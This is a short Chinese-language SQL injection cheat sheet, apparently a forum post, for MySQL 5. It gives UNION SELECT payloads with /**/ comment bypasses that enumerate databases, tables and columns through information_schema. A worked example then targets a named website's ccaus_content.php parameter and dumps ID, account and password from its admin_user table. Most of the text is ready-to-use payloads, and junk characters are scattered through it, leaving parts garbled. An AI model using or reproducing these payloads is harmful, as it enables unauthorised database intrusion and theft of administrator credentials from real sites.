查库
4 {; o3 `! s' a% k
* Y1 h) U- L- r5 {( ?9 eid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*) X& }) i9 l/ Y2 C3 N- m
5 e. u! r( ~, O( f. b
查表4 h, D' u9 G9 ]" u
1 Q3 }8 `2 e, i: s* t( F7 pid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,15 C* V \) F: j' t, M) O
5 b7 @# T: j+ F9 e* O
查段
) L2 ^! B! \! ~/ n- B* N) H. V" W: K
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,13 n# y6 B7 l$ I7 H$ o5 W6 H
3 |" A; t0 j F- M2 N7 B! |
1 F, V8 ?9 }+ \. ]) ^/ e
mysql5高级注入方法暴表/ b9 Z- g5 D) p( C/ b1 |1 m
1 ]- j6 w' H' S5 g4 T0 D例子如下:7 O9 C' ?+ y3 M9 c) L8 L1 N2 m. L
4 f5 G' r% D" [9 A
1.爆表
0 `8 j0 z# k; `http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
7 B" a3 m, W; }% Y4 B, y( B: ]! `这样爆到第4个时出现了admin_user表。
9 R6 z ]+ J2 C3 v% ]/ R- r, O9 ~, R
2.暴字段/ Q7 D- V4 |5 D; z
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
9 e5 R" C i3 N( K+ U% R
( a* Q, o( h& S M, Y1 i3 C4 ^9 l. X; [
3.爆密码1 B8 j; {" l' p) l. l! P7 y8 z. Y
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
8 _( G) `0 y' B( D8 P1 W
( u) p* t! @5 O. V4 @* t) w# n4 h D; H8 ^! S
|